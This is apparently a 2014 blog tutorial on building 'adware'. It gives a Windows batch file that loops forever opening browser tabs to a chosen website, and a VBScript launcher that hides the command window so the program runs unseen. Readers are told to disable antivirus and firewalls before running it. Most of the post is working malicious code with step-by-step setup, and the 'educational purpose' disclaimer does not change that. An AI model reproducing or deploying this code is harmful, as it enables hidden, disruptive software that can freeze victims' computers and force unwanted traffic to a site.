Thursday 2 January 2014

How to Make an Adware? 

This information is only for Educational purpose .Adware and all other malware programs do kill the computer safety and usability
Read the first part of this malicious application developing tutorial : How to make a virus using notepad ?
Whats is an Adware ?
Basically adware are categorized under malware programs ! Those can really harm your privacy and computer.An adware can promote either a product or a website of a certain group or a person.Most of the adware are entered to computers through unverified installations.So Anti-Virus programs do keep a special eye on strange setup programs you install on your computer.
Anyhow the adware that we gonna make is not that harmfull..its just a DOS prompting application that can open number of web browser tabs which will load a specified web address in all of tabs
Disable all of your Virus guards before making and launching the adware program.If the program still dont work try disabling any Firewalls too.
How to Create ?
  1. Open notepad
  2. Copy and paste the code below
@echo off
:loop
start http://www.onhax.net
goto loop
http://www.onhax.net
  1. Change the blue colored web address to a web address that you want to be loades with the adware
  2. Save the file as adware.bat . The .bat part is important !
  3. There you !! , launch the program and check
How to Kill the Adware ?
Just click on the Close button in Command Prompt window
How it works ?
  • this is just a simple code and the start function launches the web site though your default web browser
  • The loop function performs the same functions above this continuously till the program is closed
How to hide the Command Prompt window ?
Well,I knew that you will search for this option ! This isn’t easy,that means you have to create another file (Windows Script Host) to launch the adware in hidden mode.Follow me
  1. Open another notepad window
  2. copy and paste the code below and change the “adware.bat” text to the name of your last saved  batch file.
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "adware.bat" & Chr(34), 0
Set WshShell = Nothing
  1. Now save this document as Launcher.vbs.the .vbs part is important
  2. Now place both adware.bat and launcher.vbs  files in same place and run the Launcher.vbs
  3. Umm…Remember that this may freeze your computer
How to Kill the Invisible Adware ?
  1. Open Task Manager 
  2. Go to process tab and End Command Prompt Process !
Thank you for reading guys,Please don’t make internet unclean :)

No comments:

Post a Comment